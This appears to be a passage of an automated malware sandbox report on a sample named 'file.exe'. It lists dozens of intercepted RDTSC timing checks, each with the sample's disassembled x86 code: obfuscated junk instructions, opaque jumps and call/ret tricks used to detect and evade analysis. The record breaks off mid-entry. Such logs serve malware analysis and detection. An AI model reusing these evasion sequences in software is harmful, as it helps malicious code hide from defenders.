                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FDE61 second address: 5FDE9A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB418E85325h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB418E85325h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FB418E85316h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601234 second address: 601239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6012F2 second address: 601369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 6990323Ah 0x0000000e mov esi, dword ptr [ebp+122D284Fh] 0x00000014 push 00000003h 0x00000016 jmp 00007FB418E85320h 0x0000001b push 00000000h 0x0000001d sub dword ptr [ebp+122D3279h], edi 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FB418E85318h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D2D26h], ebx 0x00000045 push D79EFA52h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FB418E85327h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60145A second address: 60146D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B12Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60146D second address: 6014A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 js 00007FB418E85320h 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d jnp 00007FB418E85316h 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007FB418E85318h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6014A6 second address: 6014B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB418C0B126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6014B0 second address: 601533 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007FB418E85325h 0x00000016 jl 00007FB418E85318h 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f pop eax 0x00000020 and si, FD00h 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007FB418E85318h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 push 00000000h 0x00000043 mov ecx, eax 0x00000045 push 00000003h 0x00000047 mov esi, dword ptr [ebp+122D3A02h] 0x0000004d call 00007FB418E85319h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FB418E85321h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601533 second address: 60153D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB418C0B126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60153D second address: 601566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FB418E8532Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601566 second address: 60158D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e js 00007FB418C0B128h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007FB418C0B126h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60158D second address: 60160F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FB418E85321h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FB418E8531Dh 0x0000001a pop eax 0x0000001b call 00007FB418E85320h 0x00000020 sub esi, 206663C2h 0x00000026 pop esi 0x00000027 lea ebx, dword ptr [ebp+124570E5h] 0x0000002d call 00007FB418E8531Ah 0x00000032 mov dword ptr [ebp+122D1EE9h], ecx 0x00000038 pop edx 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FB418E8531Fh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FB418E8531Ah 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60160F second address: 601614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6135DD second address: 613600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB418E8531Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418E8531Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621B3A second address: 621B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6A4F second address: 5E6A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6A53 second address: 5E6A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FA42 second address: 61FA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FB418E85323h 0x0000000b jmp 00007FB418E8531Dh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FE9D second address: 61FEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620044 second address: 62005D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Fh 0x00000007 jng 00007FB418E85322h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620341 second address: 62036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB418C0B131h 0x00000010 push ecx 0x00000011 jns 00007FB418C0B126h 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620692 second address: 6206B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85325h 0x00000007 js 00007FB418E85316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620836 second address: 620845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 je 00007FB418C0B126h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620C1A second address: 620C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB418E85316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 614B30 second address: 614B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 614B36 second address: 614B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 614B3C second address: 614B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620D93 second address: 620DF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jo 00007FB418E85316h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FB418E85322h 0x00000012 jmp 00007FB418E8531Ch 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d push ebx 0x0000001e ja 00007FB418E85316h 0x00000024 jp 00007FB418E85316h 0x0000002a pop ebx 0x0000002b pushad 0x0000002c push edi 0x0000002d pop edi 0x0000002e jc 00007FB418E85316h 0x00000034 jmp 00007FB418E8531Dh 0x00000039 push esi 0x0000003a pop esi 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 push edi 0x00000041 pop edi 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621A0B second address: 621A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB418C0B12Bh 0x0000000c popad 0x0000000d jg 00007FB418C0B134h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625232 second address: 62524F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007FB418E85322h 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6256B0 second address: 6256B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62403A second address: 624044 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB418E8531Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624044 second address: 624051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624051 second address: 624057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625952 second address: 625972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB418C0B134h 0x0000000c jmp 00007FB418C0B12Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625972 second address: 625978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626D7A second address: 626D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BFB3 second address: 62BFBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BFBD second address: 62BFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C27D second address: 62C283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C3BE second address: 62C3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C3C2 second address: 62C3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C3C6 second address: 62C3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63117C second address: 631182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631182 second address: 631187 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631187 second address: 6311D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FB418E85322h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jc 00007FB418E8532Dh 0x00000018 jmp 00007FB418E85327h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB418E8531Ch 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6311D5 second address: 63120B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007FB418C0B126h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FB418C0B128h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov si, cx 0x0000002a push 6FA45BBDh 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 pop esi 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63137C second address: 631380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631380 second address: 63138A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63138A second address: 63138E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631896 second address: 6318B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FB418C0B126h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6318B0 second address: 6318C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6320A1 second address: 6320A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6323F5 second address: 6323FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63328F second address: 633294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634514 second address: 634518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B6F second address: 637B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B76 second address: 637BE1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB418E85318h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FB418E85318h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov si, 1EC8h 0x0000002b mov dword ptr [ebp+1247C348h], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FB418E85318h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d or dword ptr [ebp+122D2D82h], eax 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637BE1 second address: 637BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C87 second address: 639C95 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C95 second address: 639C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1E1 second address: 63A1E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1E7 second address: 63A1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1F9 second address: 63A1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1FD second address: 63A249 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D275Ch], ebx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FB418C0B128h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e or edi, dword ptr [ebp+122D3ADEh] 0x00000034 push 00000000h 0x00000036 mov di, si 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jnp 00007FB418C0B128h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A249 second address: 63A24F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B192 second address: 63B198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A381 second address: 63A385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A385 second address: 63A413 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FB418C0B128h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 xor dword ptr [ebp+122D1E5Bh], esi 0x0000002a push dword ptr fs:[00000000h] 0x00000031 and bl, 00000023h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jne 00007FB418C0B12Bh 0x00000041 mov eax, dword ptr [ebp+122D139Dh] 0x00000047 xor ebx, 50364F77h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007FB418C0B128h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 mov bx, BD83h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FB418C0B12Ch 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A413 second address: 63A419 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2ED second address: 63B306 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FB418C0B126h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007FB418C0B128h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D17B second address: 63D181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C4AB second address: 63C4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FB418C0B126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D181 second address: 63D1E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB418E85323h 0x0000000e nop 0x0000000f jnp 00007FB418E85319h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FB418E85318h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov edi, 1DF0CF1Dh 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+12456966h], edx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D1E0 second address: 63D1E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E100 second address: 63E105 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D3E3 second address: 63D3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E105 second address: 63E199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB418E85325h 0x0000000e jmp 00007FB418E8531Fh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FB418E85318h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e adc bl, 00000000h 0x00000031 mov ebx, 7B58A6F3h 0x00000036 push 00000000h 0x00000038 call 00007FB418E85327h 0x0000003d jo 00007FB418E85319h 0x00000043 movzx edi, di 0x00000046 pop edi 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FB418E85318h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000018h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 push eax 0x00000064 pushad 0x00000065 pushad 0x00000066 pushad 0x00000067 popad 